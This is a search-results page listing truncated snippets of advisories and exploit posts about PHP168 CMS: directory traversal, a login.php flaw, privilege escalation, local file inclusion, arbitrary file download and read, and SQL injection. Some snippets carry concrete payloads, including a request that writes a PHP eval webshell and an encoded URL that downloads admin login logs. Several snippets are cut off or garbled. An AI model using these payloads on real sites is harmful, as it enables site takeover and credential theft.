65 matches found
PHP168 Admin Backend Arbitrary File View/Modify Vulnerability
No description provided by source...
PHP168 Template Editor - Filename Directory Traversal
PHP168 Template Editor - Filename Directory Traversal source: https://www.securityfocus.com/bid/42174/info PHP168 Template Editor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to read...
PHP168 Template Editor - 'Filename' Directory Traversal
source: https://www.securityfocus.com/bid/42174/info PHP168 Template Editor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to read and overwrite arbitrary files in the context of the...
PHP168 6.0 and earlier versions vulnerability-vulnerability warning-the black bar safety net
Danger level: high //Looks like it is becoming more and more public. Affected versions: PHP168 versions below 6.0 Intruders can construct a special statement on the user login page and write a PHP one-liner to the cache directory, so as to obtain, on websites using the PHP168 whole-site program, the...
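Major Security Vulnerability in login.php of PHP168 6.0 and Earlier
The PHP168 whole-site system has long been favored by a large number of users. Thanks to its strengths in power, stability, security, flexibility, ease of use and other areas ... the continual improvement of its architecture and features has made PHP168 one of the most mainstream CMS systems. login.php handles its parameters improperly: an intruder can construct a special statement on the user login page and write a PHP one-liner into the cache directory, thereby obtaining WEBSHELL access to websites that use the PHP168 whole-site program. PHP168 versions below 6.0 None yet Awaiting an official patch login.php?makehtml=1&chdbhtmlname=honker.php&chdbpath=cache&content=?php%20@eval$POSThonker;?...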
Php168 v6 privilege escalation vulnerability-vulnerability warning-the black bar safety net
? php printr' +---------------------------------------------------------------------------+ Php168 v6. 0 update user access exploit +---------------------------------------------------------------------------+ '; / works regardless of php. ini settings / if $argc 5 printr'...
php168 v5.0 another injection vulnerability-vulnerability warning-the black bar safety net
by:xhming member/list.php if$step==2 if!$ aidDB //----------------------------------------- showerr"ÇëÖÁÉÙÑ¡ÔñÒ"ƪÎÄÕÂ"; elseif!$ Type showerr"ÇëÑ¡Ôñ2Ù×÷Ä¿±ê,ÊÇɾ3ý"1ÊÇÉóºËµÈ..."; if$Type=='yz' if$Tyz1 $Type=='unyz'; elseif$Type=='leavels' if$levels1 $Type='uncom'; else $levels=1; $Type='com';...
php168 v5.0 injection vulnerability-vulnerability warning-the black bar safety net
by:xhming Home call requirePHP168PATH."inc/label.php"; Continue to follow up; label.php if$jobs=='show' if!$ COOKIEAdmin showerr"ÄãÎÞÈ2é¿"; //"ñÈ¡I·ÓëÎ2µÄ±êÇ© pregreplace'/$label\a-zA-Z0-9\+\/eis',"labelarrayhf'\\1'",readfilehtml"head",$headtpl;...
Php168 v6 privilege elevation vulnerability-vulnerability warning-the black bar safety net
by Ryat http://www.hackgood.com Working every day, I haven't posted on the forum in a long time... I previously published a php168 v2008 privilege elevation vulnerability; this vulnerability also appears in the same code segment. I give the exp directly; some of the details in it are rather interesting, and interested students can...
Php168 v6 privilege elevation vulnerability-vulnerability warning-the black bar safety net
by Ryat http://www.wolvez.org 2009-07-17 Working every day, I haven't posted on the forum in a long time... I previously published a php168 v2008 privilege elevation vulnerability; this vulnerability also appears in the same code segment. I give the exp directly; some of the details in it are rather interesting, and interested students can...
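Php168 v6 Privilege Escalation Vulnerability
Working every day, I haven't posted on the forum in a long time... I previously published a privilege escalation vulnerability in php168 v2008; this vulnerability also appears in the same code segment. I give the exp directly; some of the details in it are rather interesting, and interested students can analyze it themselves: mail:[email protected] PHP168 V6.0 None yet Please follow the official site: http://www.php168.com/ !/usr/bin/php ?php printr' +---------------------------------------------------------------------------+ Php168 v6.0 update user...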
Php168 a local file inclusion vulnerability-vulnerability warning-the black bar safety net
Php168 local file inclusion vulnerability. Looking at the v6 version, in the do/job.php file: ... elseifereg"^-0-9a-zA-Z+$",$GETjob||ereg"^-0-9a-zA-Z+$",$POSTjob requiredirnameFILE."/"."global.php"; ifisfilePHP168PATH."inc/job/$job.php" includePHP168PATH."inc/job/$job.php"; Well,if you ope...
Php168 Local File Inclusion Vulnerability
In the do/job.php file: ... elseifereg"^-0-9a-zA-Z+$",$GETjob||ereg"^-0-9a-zA-Z+$",$POSTjob requiredirnameFILE."/"."global.php"; ifisfilePHP168PATH."inc/job/$job.php" includePHP168PATH."inc/job/$job.php"; Well, if globals is turned on, the GPC variable registration order can be used to pass that regex check; however, php168 kindly implements a feature that emulates registerglobals=on, in the inc/common.inc.php file:...
Php168 v2008 elevation of privilege vulnerability-vulnerability warning-the black bar safety net
by Ryat http://www.wolvez.org 2009-01-25 A simple analysis of this vulnerability PHP code 1. common.inc.php 2. 3. if$SERVER'HTTPCLIENTIP' 4. $onlineip=$SERVER'HTTPCLIENTIP'; 5. elseif$SERVER'HTTPXFORWARDEDFOR' 6. $onlineip=$SERVER'HTTPXFORWARDEDFOR'; 7. else 8. $onlineip=$SERVER'REMOTEADDR'; 9. 1...
php168 v2008 default setting of the disaster-vulnerability warning-the black bar safety net
index.php, starting at line 63 1. elseif$webdbNewsMakeHtml==1 //if it is to generate static and... 2. 3. $content=obgetcontents; 4. obendclean; 5. obstart; //spare 6. $content=makehtml$content,'index'; 7. echo "$content"; 8. makehtml function code 1. function makehtml$content,$pagetype=" 2...
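PHP168 Arbitrary File Download Vulnerability
The PHP168 whole-site system is currently the most powerful site-building system in the PHP field. Its code is entirely open source, secondary development is extremely convenient, all functional modules can be freely installed and removed, and it is completely free for individual users. This exploits a coding vulnerability in the program to download the configuration and login log files 2008 None yet http://www.php168.com/ Download the two files mysqlconfig.php and adminloginlogs.php to the local machine. http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="...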
PHP168 whole Station system of 0DAY-vulnerability warning-the black bar safety net
Let me first explain: I saw this hole elsewhere, but the author did not explain it very clearly and a lot of newbies did not understand it, so I am posting it here first! This hole actually exploits a coding vulnerability in the program to download the configuration and the login...
Php168 Arbitrary File Read Vulnerability
Code:..job.php Line:117 if eregi".php",$url die"ERR"; $fileurl=strreplace$webdbwwwurl,"",$url; ifisfilePHP168PATH."$fileurl"&&filesizePHP168PATH."$fileurl"10241024500 $filename=basename$fileurl; $filetype=substrstrrchr$filename,'.',1; $filename=pregreplace"/\d+200\d+^+.^.+/is","\3",$filename;...
Php168 read arbitrary file vulnerability-vulnerability warning-the black bar safety net
Reprint address: http://hi.baidu.com/saiyhi/ Oh, forgot to say, the program official URL: http://www.php168.com/ Code:..job.php Line:117 if eregi".php",$url die"ERR"; $fileurl=strreplace$webdbwwwurl,"",$url; ifisfilePHP168PATH."$fileurl"&&filesizePHP168PATH."$fileurl"10241024500...
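Php168 v2008 SQL Injection Vulnerability
After several years of development and refinement, the "PHP168 whole-site system" is the earliest multi-functional, modular website management software system in China; it is suitable not only for building small sites for ordinary businesses, governments, schools and individuals, but also for building medium and large sites such as regional portals, industry portals and paid sites. 80sec found a serious SQL injection vulnerability in the product that could let a malicious user query sensitive information in the database, such as the administrator password, the encryption key and so on, and thereby take control of the whole site. In the system's jsarticle.php, urldecode is used to decode user-submitted data, but no further validation is performed after the function is used, so carefully crafted data can bypass the system's filtering as well as PHP's Magic Quote protection. The vulnerable code is as follows:...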